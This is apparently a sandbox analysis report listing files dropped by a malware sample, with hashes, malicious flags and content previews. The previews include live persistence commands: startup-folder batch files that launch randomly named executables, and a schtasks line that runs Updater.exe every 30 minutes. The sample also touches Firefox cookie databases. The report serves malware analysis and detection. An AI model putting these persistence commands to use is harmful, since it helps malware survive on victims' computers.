                                                                                                                                                                                                                                SHA-512:2B0A13430E846C0A021A09960D1E71CC57D4117C8FFBE812B672A67F13C9CE957EBCC89D5437F45D3210B98E293E45C41CCC8F3861A638F6F5127C75F745B8FB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\cBFvqvrl6uXFbTB4JYYj3iX2.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tCfx7C0T7ChpGlE7H15p1O5u.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.979911370098062
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5WbkyLQ9fnu0CHF:fE1wkn23WIfnsHF
                                                                                                                                                                                                                                MD5:730B3AAD03243133F01CC924C2892CF5
                                                                                                                                                                                                                                SHA1:577378B585BE8C46797ACD1BDDD5B26C5783D7AC
                                                                                                                                                                                                                                SHA-256:5D8CFA0010E09728376F51D30B07C81A99CD9486F3A32D4E8E22A39C3C585A1D
                                                                                                                                                                                                                                SHA-512:172CFD8FD1F65B0DAC05BF1BF2533C2A5ED9C17CD63CFB272572B2AFC1495B182DDD6AF9AC64AEBE05FE014E3291B3FD1DCD0BF06A5681CAF0DB102960F7FCA0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\3MdVqnAjjJf11QnuXHbMYjzK.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tDJLaHZLLtRSKU5ceCcvYzy0.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.882014449776854
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5DDqwNOJHFn:fE1wkn23Hqwul
                                                                                                                                                                                                                                MD5:7E4A2B9689CBD5AB65D1416CC7047888
                                                                                                                                                                                                                                SHA1:21A13F14872173E5109AC6C589849877BFD0A7BF
                                                                                                                                                                                                                                SHA-256:EF90D7ADD294D840DF19308722D70E55FE9F3D4270A0592FDB434C9F543F4A04
                                                                                                                                                                                                                                SHA-512:9F1E14D435A901514E6A887C92E4BFFFE8CF9D348F370FBB3465193DCEF9C818ED04D627BF13F1A40315BCBC485BEE5C604AE42DE0937904AA98964E57CEC035
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\faO2uzdAaG1P228qHtBBLcZH.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tMnW1nNhCxc57ShEccGmAfuc.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.997956478762361
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5dxSgskLVCSkpDUW:fE1wkn23z5LVRkpDP
                                                                                                                                                                                                                                MD5:8E525CA955502A90975CCCB51F6E1194
                                                                                                                                                                                                                                SHA1:AF268BC90DC49614341888E1D0BD966B2CA09C9D
                                                                                                                                                                                                                                SHA-256:2271146DCC37C2D9632441D1E6885E293052126CEA4E043CDADCA714DB09285F
                                                                                                                                                                                                                                SHA-512:9ADC8A1DF701FEAE70B8671D1439135B41DC71EA5806D7E73271966ACEB8E1F613FAFD1BAFFF047251D4173DD6A159708E2C48967CF37961CCEDA6A6010EEE39
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\8T7EILlANzGG35y6DwATJf1o.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tpmbygrB8VoHP1SuBe596Iom.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.037882384590816
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5BvyifsOSAOKLvn:fE1wkn23ZwOSjKL
                                                                                                                                                                                                                                MD5:3C85C4A74D1CC61C6AC82941ABDB5C07
                                                                                                                                                                                                                                SHA1:75CF15C8926EF68FB715DE792EA91D484172C345
                                                                                                                                                                                                                                SHA-256:254016A81AA3746AA6D360BEB6047190B8C878D729C19ECB07F7728FC16CF1A2
                                                                                                                                                                                                                                SHA-512:65A8F679D62C26EA59C61674C9F0F61496FB9EC03A279BA30FB3E5E0F2C288AF622F74A480AD8624AA6CBDC07443269F5371D5E9961F06B94A66E70B40D636ED
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\dJWgkx2NkzIq27ZmDKfJlJSb.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tpxByPiHTfm0FXRZ9jVXDXqE.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.958030572933904
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5PdZ0C8hri2PkAHF:fE1wkn23VT2Pkm
                                                                                                                                                                                                                                MD5:73A5F40CE9E4C5CBDC0533ABF03EE6BA
                                                                                                                                                                                                                                SHA1:7636BA6A6A5F7DAFB3B638D384F5E063775441ED
                                                                                                                                                                                                                                SHA-256:D7703D43424CAF01D3A883AB430F07603A211969F249C097DED79922642C0DBF
                                                                                                                                                                                                                                SHA-512:AF8DCCF2110C361DB12814AFEBE59194A5BC8A9B93B21CFDE5A262B8869CE0BC9BB8E04C8A9F0E1E80EFFA84C96EDBBB907AE5989B27FCDD51D6F8C8E69F9D85
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\jum4cD5QgYDb9AipfhKNG4uj.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uMHc9fDef8Mu32GWDJP5t5su.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.80926734820216
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5xLpy5JHF:fE1wkn23Npy3l
                                                                                                                                                                                                                                MD5:9798BD8D0B2B7DE06953F1BD10272A7F
                                                                                                                                                                                                                                SHA1:F932BB0A0471391311E63615B8111FE2A30EF1E0
                                                                                                                                                                                                                                SHA-256:3B2115607BD66CD4A2646CF9907D9C1866F5C9586B516C2ECD42E355A271D849
                                                                                                                                                                                                                                SHA-512:C43E8EAABAA22668A1F00C1A81CC2DDCC82D60467FE2F415AF32676CA73F61A482F8875C17296A56C024BC9C8D4226D0F6E5EF6FAEBFFD34C7688AA4AB389CF6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\TnWsoNZIfxfOxOyjMDzsjp4X.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uPpk0o97VYSvo6hjGFH0TQqL.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.025494660354971
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J52HfcIOQ4MCHF:fE1wkn232H0i4MEF
                                                                                                                                                                                                                                MD5:3DE01D2DA8E03FBEF35D602806E90D4D
                                                                                                                                                                                                                                SHA1:28D59402F0BE40C6BF23BC7C26F4F1918370AD78
                                                                                                                                                                                                                                SHA-256:2819E6DDF69DBBC8D40110542434E5A79FDDAABD9813EB30EA9278DAFA134FFF
                                                                                                                                                                                                                                SHA-512:2211EEC106BEB25D82C0B23656B8C82269F338E36758828C1D6B9AC8592BAE91353DBC959BFFF56732FC308CDDE48970653643959732D059355D8DFE7BACE8DC
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\SSEzfyhdmFgId4wuINTHaAmw.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v4bWLa58H6i1mhTHOnasQ1vq.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.037882384590816
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J53VBDpZ3DnVql:fE1wkn23FBD7DnVql
                                                                                                                                                                                                                                MD5:3779F1C772FE91DBBC9875BA481E90CE
                                                                                                                                                                                                                                SHA1:2A69AA2A31E89C4FEE79B2555B7B82496E2C732B
                                                                                                                                                                                                                                SHA-256:AAED85A50D7E33FEAAACC803E05C8BD0C3E6FF333B3BB06BCD8F7AE6C49123BE
                                                                                                                                                                                                                                SHA-512:11CCFCF059225B5FE54A351747BBEB3040010B82FF6C712CB17B34211679E98017F1F8C43C9BD10F8CFCDDC0A2EBCDB2ECE9643B22BE6911D204AE8845C51180
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\RjS1Nhdf06REy5J9bfLmGhpU.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vtZyB8nLuAZWzY9cL759HQik.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):5.030742475370033
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5WIQYTlWxkdan:fE1wkn23WIQ7xD
                                                                                                                                                                                                                                MD5:F705DB1B5329FE5AC05E6C9B130B0DCB
                                                                                                                                                                                                                                SHA1:BFEA175F219404174279986E38B61B8D9030D43A
                                                                                                                                                                                                                                SHA-256:B0602DA9E7197537733A4B7EBB5618FCC40E8B7964B515C8B504D68EA370AE88
                                                                                                                                                                                                                                SHA-512:D212130C5F4E49A30A7A61483F1A597C97FCAEABE04246E866EEA996BDBFF41927F8DF636132BE1FBF8A723E983AD0CB563E1208BF4F074DE285E2B47900A005
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\3m556AQE7tDOPkLnbR8jRGPu.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wfxQxKS1grbtlbpNfFfWg0ap.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.858686326958929
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5DML8I1GGLAEF:fE1wkn23Md1zLv
                                                                                                                                                                                                                                MD5:FE0EA9265D69FF07D93F2D7085F58DEB
                                                                                                                                                                                                                                SHA1:B45BC1AECF7D93231B30D993E14FFFD96BE91617
                                                                                                                                                                                                                                SHA-256:1933F32307755D343EE27DC2F33E93EB6C49F41024201CB9E571496B66521956
                                                                                                                                                                                                                                SHA-512:07FAFBE63D1658603ABE2119E14D5DF7B08B765D01A24AEFB27B0F97EA4635AC42C0FCF7F6870A49F5D769729883C7D874B0948BBA9805BE6809AF3F27DACFFC
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\flgUFRxMTOax9vom3NLtvcuv.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xvAX15SR7EcYwQ5Q2lE9XfHz.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.037882384590815
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5cFykTR8diF:fE1wkn23cFyWF
                                                                                                                                                                                                                                MD5:F0DC450980D9CEA90E64F17965B710D1
                                                                                                                                                                                                                                SHA1:4C8E433F193A3BB0FE7797B7EE350BF8B3A896B9
                                                                                                                                                                                                                                SHA-256:8003A1CD4F93A495DF7EC750342FBF598865520A9A1BB4BB3716D929F191FE7F
                                                                                                                                                                                                                                SHA-512:8D7AD974C0D92007E8B88394384C7C2180CBB64C272A9E01E168EA949429D7DF17B3D0CBB6F4ACA4D4174A99723C6D04EEABCBCEDCBB894CF839D03316C8A3C6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\94MOPbtk8fV3QmrVJFZPX8uo.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zCp3tcAX5zWepThqbpQcv3Vp.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.106793797665648
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5ScS4SWposHF:fE1wkn23SchAsHF
                                                                                                                                                                                                                                MD5:F4AE9B0C73A4A2828DF56A62915FA789
                                                                                                                                                                                                                                SHA1:D06A2C762BA33739ABDEC21E4F84E17CCAA54F27
                                                                                                                                                                                                                                SHA-256:7511C0DA043404A4519B377735C47BD175BDAFC3FFBCA33D006D2C9D36E03C03
                                                                                                                                                                                                                                SHA-512:5B834D7E9DD4CBD45EF47A637EFD9A0017DA3D293411232BD43B51D93949B26A2E5CB46C246C3C4C479C0CD8CF8ED076F777AC5A2198D45F60092CFDB2894F5D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\wQY4uiHIT1Rmw3D6dX7Mml4K.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zaUcC3Pe1Igei62bzfib2Lgh.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.02549466035497
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5c/ixCDZ6qX/TI0EF:fE1wkn23caqXbnEF
                                                                                                                                                                                                                                MD5:BE4EEE4B139221D6119F60F74EC3213D
                                                                                                                                                                                                                                SHA1:F4FC7447C4DE6EEADA053B66F62A86E9A987FEF0
                                                                                                                                                                                                                                SHA-256:9FB37BDEA5FA6416B31B5049F6925A33F15E99F3167B7E93FBE6DBF497D8EDE6
                                                                                                                                                                                                                                SHA-512:FD3532E12F4B1E3A7874F0F25953FE0740E623F605CDDA0D25B90387E2E2A0F45EA6CEF7F2288F62BC0A39C1DEC003A54169935955ED0BDDF51821DB3832E654
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\9ZQJrRTgdPaUJ304O2m7brvm.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                Entropy (8bit):3.3454618442383204
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:FkWXlXyQKzn:9k
                                                                                                                                                                                                                                MD5:976D358ABB15420B78C64AD22A4A615D
                                                                                                                                                                                                                                SHA1:59AA20E70D82B0FF4A901E935D8C7E8E04F6BD9A
                                                                                                                                                                                                                                SHA-256:0C97AA188CFDE2203FFF6BB080B9B328C974687184E6E4757FD0FD3A61CE1BB5
                                                                                                                                                                                                                                SHA-512:8DF029FD54FA180B1BB506D7AE52D323F4E21D76FDBD8B243BE36FD920F9152BE82E565F0626AEF09D482409F5FA1338E63F471D08F2FE8EB208B6D9BD575528
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:sdPC.....................o..?e/F..V..V.+

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Temp\Task.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):128
                                                                                                                                                                                                                                Entropy (8bit):4.806068215477973
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:HFUuvaOpLKBchEXEtTC5WAut+kiE2J5xAIEyrKBySKFS3:Ogas7SXEFAuwkn23faKS3
                                                                                                                                                                                                                                MD5:43A95207D30C95F513309A882D511D25
                                                                                                                                                                                                                                SHA1:B5088D2A0F8BDEBFCABCB194362AB59D20014F29
                                                                                                                                                                                                                                SHA-256:DDA9B22F2D2D9CFF7036DEEBDDE40E7CDB62F2587DFC304FE32EF9BFA974DFB6
                                                                                                                                                                                                                                SHA-512:52BDAA18A5883343C56F33FC631D2E63B2D30730C482D8278FFA9C8CD9E6469DC88BB32DFDF16118E279D6DC715C92D8DBF534A4D8698195CD14DFD7BC7034ED
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:chcp 1251.. schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F..

                                                                                                                                                                                                                                C:\Users\user\Pictures\03oBcB8Rvh6nT71GnuDYAwPv.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Pictures\1BQ01vHeZNC7Uq8eldwE5IHM.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
